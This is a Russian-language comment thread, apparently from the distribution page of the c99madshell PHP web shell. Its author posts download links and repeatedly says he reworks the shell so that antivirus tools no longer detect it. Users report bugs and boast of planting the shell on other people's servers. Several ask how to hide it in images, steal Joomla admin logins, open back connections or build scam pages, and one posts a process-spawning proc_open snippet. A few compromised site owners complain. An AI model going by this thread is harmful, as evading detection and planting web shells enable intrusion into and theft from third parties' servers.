Aerot1smo
молодец,понравилось!
~~~~~~~~~~~~~
XuYuZu
А когда будут новые версии?
~~~~~~~~~~~~~
madnet
Скорее всего новых версий не будет, но зато будет совершенно иной прое
кт на основе этого шела.
~~~~~~~~~~~~~
^^^.^^^^^^..^
peschi escho!))
~~~~~~~~~~~~~
Christof
А когда будет этот иной проект? Есть пара идей что б можно было б даба
вить если интересно дай знать на kislotex[a]gmail.com.
~~~~~~~~~~~~~
Daned
Шелл РуЛиТ!
Respect.
~~~~~~~~~~~~~
Кул-хацкер
Молодец, уважаю
~~~~~~~~~~~~~
shurup
А можно віложить версию
незакодированную zend-ом?
~~~~~~~~~~~~~
madnet
Он не закодирован ZEND'ом, он просто сжат gzip'ом и ты без пробл
ем можеш сам его распокавать.
~~~~~~~~~~~~~
teinacher
Отличный шелл.
~~~~~~~~~~~~~
madnet
Зендовую версию шела можете скачать здесь
http://madnet.name/other/scripts/c99madshell_Z.php.txt
~~~~~~~~~~~~~
C[]R3
ща затестим)
~~~~~~~~~~~~~
madnet
Nek1t,
По ссылке скачать находится незенденая версия.
~~~~~~~~~~~~~
Im
на уязвимой машине выдаёт:
Ze Optimizer not installed
~~~~~~~~~~~~~
madnet
Im,
ты видимо качал его давно, скачай еще раз.
~~~~~~~~~~~~~
NOmeR1
Жаль, что не опенсорс :(
А так юзаю.
~~~~~~~~~~~~~
madnet
NOmeR1, сорс посмотреть займет не более 1 минуты. Он открыт, просто сж
ат для экономии места и скрфтия от антивирей.
~~~~~~~~~~~~~
6e.65.6f
Только в скрипте проблама с выставлением прав, ставишь нужные галочки,
а прова совершенно другие выставляются!
~~~~~~~~~~~~~
madnet
есть такой глюк. учту
~~~~~~~~~~~~~
GiGiKlo
А как ты так скрипт сжал ?
~~~~~~~~~~~~~
madnet
gzip'ом
~~~~~~~~~~~~~
derw0r
спс, норм шел, ой сори норм мэд шел =D
~~~~~~~~~~~~~
Васек
на .еде нет gzip'а
я в трауре ) выложи несжатый плз
~~~~~~~~~~~~~
forint
madnet а ты не хотел добавить раздел sploits как когдато в шелле от хосе , если его тут помнят ещё... "nfm" я когдато е го тестером был =)))
~~~~~~~~~~~~~
genom--
его просто совсем распаковать че вы паритесь - просто приходится раз 10 его прокручивать а так нормально
~~~~~~~~~~~~~
madnet
forint, нет в таком виде сплоитов не будет 100%
~~~~~~~~~~~~~
markovka
Ну че мудаки, так и не смогли мой сайт сломать? От горшка два вершка, а уже выпендриваются. Юникс хотя б выучили сначала, отморозки!
~~~~~~~~~~~~~
markovka-debil
ссыль в студию придурак =)))посмотрим чем ты там так выебываешься. А за шелл спасибо большое )) нищтяк шелл, ф сейф моде мона норма работать, а то р57 всегда чушь гонет какую то )) спасиба за шелл!!!удачи. markovka жду ссыль на твой мегасайт
~~~~~~~~~~~~~
Спасиб
Хороший шелл уже раз 10 качаю )
~~~~~~~~~~~~~
2.1
Я так и не понял,адванцед шелл это твое? или чьято доработка? если твой,то дай ссылу ((;,а если и не твой,то тоже дайте кто-нибудь,посмотреть хочу что за чудо (;
~~~~~~~~~~~~~
НекТо
madnet,Можешь поподробнее рассказать как разархивировать из Gzip'a ? а потом с настроенным паролем снова запаковать?
~~~~~~~~~~~~~
madnet
2.1, да там ничего хорошего нет на сколько я видел.
НекТо, а зачем распаковывать? там настройка пароля вынесена за границы упакованого текста.
~~~~~~~~~~~~~
pukto
palitsa AV
~~~~~~~~~~~~~
Mr.OxY
COOOOOOOOOOOOOOL
~~~~~~~~~~~~~
madnet
Антивирусами уже не палится, подробности на
http://madnet.name/news/49.html
~~~~~~~~~~~~~
PSalm69
мега шелл, уважаю!
~~~~~~~~~~~~~
madnet
Nek1t, уже на месте.
~~~~~~~~~~~~~
1x
madnet, скока те лет если не секрет?
~~~~~~~~~~~~~
DNS
самый лучший шелл из тех что юзал...еще бы только баги исправить...
~~~~~~~~~~~~~
1x
DNS, а какие там баги? (пока что не юзал)
~~~~~~~~~~~~~
Ivan
Супер сенькс Madnet.
~~~~~~~~~~~~~
NoNa
респект.жду новую версию
~~~~~~~~~~~~~
GUEST
кстати, чем кодировать файлы в gzdeflate
~~~~~~~~~~~~~
pantur
респект мэднету! уже заюзал этот шелл у двух ламерков на серверах =) не палитса работает на ура, но есть такая штука - когда часто обращаешся к нему, он потом начинает очень сильно тормозить или вобще перестает работать. и так до перезагрузки сервера того =( объясните что это за штука
~~~~~~~~~~~~~
HMmmm!!!!
Vot ashibka :(
Error: Can't chmod to 0777.
~~~~~~~~~~~~~
Nek1t
Видел в инете C99madShell v. 2.1 madnet edition ADVANCED Откуда взялась версия 2.1? Последняя же вроде 2.0...
~~~~~~~~~~~~~
lloid69
Спасибо, щас залью.
~~~~~~~~~~~~~
madnet
Nek1t, это левые переделки, не относящиеся ко мне.
~~~~~~~~~~~~~
MAN
Все, конечно, хорошо. Только с помощью этого шелла невозможно переименовывать файлы. Вот это, пожалуй, самый главный недочёт. Если Вы знаете, подскажите, как это сделать. Заранее спасибо.
~~~~~~~~~~~~~
MAN
кто ответит?
~~~~~~~~~~~~~
madnet
MAN,
mv oldname newname
~~~~~~~~~~~~~
mahoro
про вас:
http://dow.ngra.de/2008/11/04/script-kiddies-have- awesome-tools/
вы молодцы!
~~~~~~~~~~~~~
Nek1t
madnet, убедительная просьба исправить/добавить следующее:
1) Заливка файла в корректную дирректорию, а НЕ в которой лежит шелл
2)Добавить переименование файлов
3)Исправить SQL-клиент
4)Добавить просмотр изображений прямо в шелле
5)Вернуть энкодер/декодер, который был в оригинальном шелле от с99.
п.с. Я, конечно, понимаю, что есть PHP-eval, и многое из написанного делается в нем "ручками", типа rename("oldname.php", "newname.php"), echo base64_encode("qwerty") и т.д., но все же удобнее жмакать кнопки 8)
п.с2. Возможно, с трудом могу и сам все это реализовать, но только надо будет разбираться в структуре шелла, копать чужой код и т.д. А тебе-то проще, м? :]
~~~~~~~~~~~~~
Dia
Молодец !!!
Супер релиз !!!
Правда вот некоторые нюансы портят все наслаждение этим скриптом.
- особенно, невозможность изменить права к папкам и файлам, да и работа с базой.
~~~~~~~~~~~~~
asshole
прикольный шелл
~~~~~~~~~~~~~
TROYAN
рульный шелл
~~~~~~~~~~~~~
Александр
Здравствуйте! Обьясните пожайлусто, как пользоваться шеллом. ICQ 424-652-641
~~~~~~~~~~~~~
reigan
А шел сёровно палится .(((
http://www.virustotal.com/reanalisis.html?6e411b37 c2571e9fb9a89c82d44278f9
~~~~~~~~~~~~~
Ламер
Расскажите, а как от этого защититься?)))))
~~~~~~~~~~~~~
TROYAN
0_o
~~~~~~~~~~~~~
madnet
reigan, двумя антивирями палится
a-squared, Ikarus
не вижу смысл обходить их сигнатуры
~~~~~~~~~~~~~
Shell'овод
Слушай... Можешь, пожалуйста, выложить распакованную версию?
~~~~~~~~~~~~~
zzz
madnet, громадное спасибо за сей замечательный шелл! успешно использую его уже достаточно долгое время)
заметил весьма серьезный глюк - mysql менеджер неправильно работает (палит местонахождение файла), если использовать директиву DirectoryIndex (для сокрытия названия файла - тогда просто можно обращаться к папке, очень удобно)
Также глюк с правами.
Еще один мега-баг - если стоят галочки на файлах и нажать empty buffer, файлы СТИРАЮТСЯ. ((
Также можно приделать поп-ап для просмотров файла?
Еще раз спасибо) очень много людей юзают твой шелл) знай, что ты полезен миру! =))
~~~~~~~~~~~~~
Sadist
Скажите как его закинуть на сайт ? )
Ато я тут не нашол высказываний на этат щет
~~~~~~~~~~~~~
КЕСс
Шелл вообщеот души! = пяцот :) тока его антивирус словил у буржуя на сайте :)
~~~~~~~~~~~~~
zzz
Пожалуйста ответьте на мой предыдущий комментарий.
(также нашел еще один глюк - не работает архиватор если в названии папки присутствует пробел)
Дальнейшая работа над шеллом планируется?
Если исправить мелкие глюки вообще идеальная машинка получается)) ну и новых может добавить, полезных))
Спасибо)
~~~~~~~~~~~~~
zzz
*добавить новых фич, а не глюков))
~~~~~~~~~~~~~
seeattack
а какая последняя версия шелла?
или только одна...
~~~~~~~~~~~~~
madnet
Только одна...
~~~~~~~~~~~~~
XZKTO
Бля, два интернет магазина убили, хулиганы.
~~~~~~~~~~~~~
Sanek!!
Сегодня нод начил палить шелл за вирус...madnet подредактируешь???...
~~~~~~~~~~~~~
madnet
Sanek, исправил
~~~~~~~~~~~~~
yesno
Если ставлю логин и пароль нехочет логиниться, постоянно прыгает перезапрос, ...или там что-то с сессиями. можно ли поправить это?
~~~~~~~~~~~~~
Sanek!!
---madnet
Спс.
~~~~~~~~~~~~~
Костян
Бля залил скрип на хост, не бычит:
тока вот это на экране ---
~~~~~~~~~~~~~
seeattack
ищи баги в руках
~~~~~~~~~~~~~
komyak
Работает нормально =) Я его совмещаю с DxShell нормальное такое сообщество получается. Автору спасибо.
~~~~~~~~~~~~~
core
Да, баг с авторизацией есть. На некоторых серверах не работает. Madnet, может переведешь с HTTP-авторизации на обычную через POST?
И, кстати, Шелл не работает с файлами, в именах которых есть [,], знаки пробела и т.д. Почему-то они переводятся %xx
~~~~~~~~~~~~~
попугай
А v3.0 приват еще? Мне попался трофейный) blog edition
~~~~~~~~~~~~~
madnet
3.0 версия не выходила, все что будет выходить будет пабликом!
~~~~~~~~~~~~~
piod
http://rapidshare.com/files/250138644/ic.php.html этот удобнее , чем громоздкий с99
~~~~~~~~~~~~~
Oza
Спасибо:) Зачётно.
~~~~~~~~~~~~~
f##k
антивирусники запалили шелл !
Даёш другое шифрование!
~~~~~~~~~~~~~
b-тn
полезно бы добавить возможность исполнять произвольные sql-запросы
~~~~~~~~~~~~~
AGS
Люди пожалуйста, хоть в кратце объясните как им пользоваться?
~~~~~~~~~~~~~
Fuckel
добавь работу с процессами, например
(мб это реализовано на странице Proc, но у меня еррор эвал)
$query = '';
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "mystem-error-output.txt", "a")
);
$process = proc_open('cmd', $descriptorspec, $pipes);
if (is_resource($process))
{
fwrite($pipes[0], $query);
fclose($pipes[0]);
$out = stream_get_contents($pipes[1]);
fclose($pipes[1]);
proc_close($process);
}
~~~~~~~~~~~~~
Првиет
Привет всем. Как дела.
~~~~~~~~~~~~~
Woka
А как загнать его в картинку?
~~~~~~~~~~~~~
Sanek
Приветик :) антивирь опять ругаеться :D , исправь если не трудно :)
~~~~~~~~~~~~~
System administator
ClamAV палит. Только благодаря ему и нашёл эту заразу на своём сервере.
Автор мозг, конечно, до сих пор не разобрался, как он смог пробраться мимо включенного mod_security и hardened php.ini, в котором отключены все системные команды кроме fopen
~~~~~~~~~~~~~
LiRvD08
DrWeb палит
~~~~~~~~~~~~~
14m3r
Палят уже все.
madnet, поправь если не сложно ;)
~~~~~~~~~~~~~
slixt
how do i uplioad c99
~~~~~~~~~~~~~
yesno
Если будет свободное время:
Переделай пожалуйста авторизацию через пост.
И вот если бы была подсветка строк(наведение, выбор) вот тогда бы скорость работы возросла в разы!=)
~~~~~~~~~~~~~
баг...
баг нашел. если пароль при коннекте в базе содержит такие символы:
tB>Jk?:7*7an
То не конектица к базе, хотя пасс правильный. И через др. шелл конектица. Профикси плиз)
~~~~~~~~~~~~~
%u043F%u043E%u043F%u0443%u0433
шелл легендарный, супер
~~~~~~~~~~~~~
пупкин
что с ником?
~~~~~~~~~~~~~
пупкин
а
~~~~~~~~~~~~~
testings
27.02.2010 1:32:12 HTTP filter archive http://madnet.name/files/download/9_c99madshell.ph p PHP/C99Shell.BF trojan connection terminated
~~~~~~~~~~~~~
Mike
please can i upload shell on anonymous login or with anyone/anyone@anyone.net. I am a new bie. i need tutorials to create my own shell for scam pages
~~~~~~~~~~~~~
Mike
my email is fomattt@yahoo.com
~~~~~~~~~~~~~
SkyNET
Автор, пожалуйста разберитесь с установкой прав. Я попытался использовать как админку сайта, в результате он при попытке выставить CHMOD 777 забаррикодировал все папки...
Пришлось суппорта просить вернуть мне доступ на хостинг...
~~~~~~~~~~~~~
Jo
dr.WEB палит
~~~~~~~~~~~~~
hackmon
каспер палит......мепедалой
~~~~~~~~~~~~~
lamabeat
Благодарю Тебя, madnet.
Если будет возможность добавь аунтефикацию по паролю в этом или новом проекте на основе этого шелла - будет класс!!
Успехов и процветания!
Приятной работы ;)
~~~~~~~~~~~~~
шаман
я когда беру едит например чара то высвечиваетца хз что там если вписать даж то всеровно ничего не сохраняет
~~~~~~~~~~~~~
shaman
так дайте сылку
~~~~~~~~~~~~~
kto lox?
Ya lox
oO rly?
ugu
~~~~~~~~~~~~~
<?php shell ?>
последние три поста вы идиоты ))))
~~~~~~~~~~~~~
<?php shell ?>
ОО
~~~~~~~~~~~~~
lsd55
Всё отлично рулит
~~~~~~~~~~~~~
bulkin
При загрузке NOD ругается C99Shell.BF
~~~~~~~~~~~~~
Tim
How about a search and replace function so that poor bloggers and moodlers can remove all the code that people are injecting using c99madshell
~~~~~~~~~~~~~
Serg
Может и хороший, только антивирусом режется
~~~~~~~~~~~~~
Eugen
РУЛЬ
~~~~~~~~~~~~~
ReckouNT
Переменные
$login
$pass
$md5_pass
отвечают за допуск именно меня, правильно понимаю?
у меня вопрос, не понятно почему
$pass
$md5_pass
З.Ы. есть декодированная версия. ася 3девять7три7два1
~~~~~~~~~~~~~
Вадим
добрый день!
Прошу прощенья за вопрос, но у меня такая ситуация, залил данный шел на joomla, запускаю его, а что дальше, скажите могу ли я с помощью этого шела узнать пароль и логин к администативной панели?
С Уважение, Вадим
~~~~~~~~~~~~~
Жертва
Подскажите кто нибудь как боротся с этой х*нёй!!!
~~~~~~~~~~~~~
LiRvD08
Shell понравился, единственное что через него не смог забиндить порт или сделать Back connect, пришлось заливать другой shell. Автору респект. c99madshell будет дорабатываться?
~~~~~~~~~~~~~
ANCOUS
все супер, спасибо
~~~~~~~~~~~~~
юра
как скачать шел? Ругается нод на него не дает скачивать. Можете выложить его предварительно заархивировав?
~~~~~~~~~~~~~
sunnydayrecords.es
great tool for my admin tasks
~~~~~~~~~~~~~
хм..
Скачивал с разных источников, вводу пароль заливаю на сервак, непускает в админку... Пустил толкьо очень старый от 2005 года.. Остальные видимо под кодом имеют альтернативную авторизацию. Может я что то не так делаю...
Хотя сложно сделать что то не так, в поле где надо тупо указать логин и пароль.. Но все же, очень хочу посмотреть на него в действии..
~~~~~~~~~~~~~
=)
При попытке установить обратное соединение.. ругается...
Result of back connection:
Can't download sources!
я так понимаю в коде ссылки на исходники не те... где их взять? исходники эти...
~~~~~~~~~~~~~
filippok
Беда!!! favicon.ico все палит, он постоянно на сервер за ним обращается и из-за это логи растут
~~~~~~~~~~~~~
shadow
www.youtube.com/watch?v=y-Z5-uHvONc
~~~~~~~~~~~~~
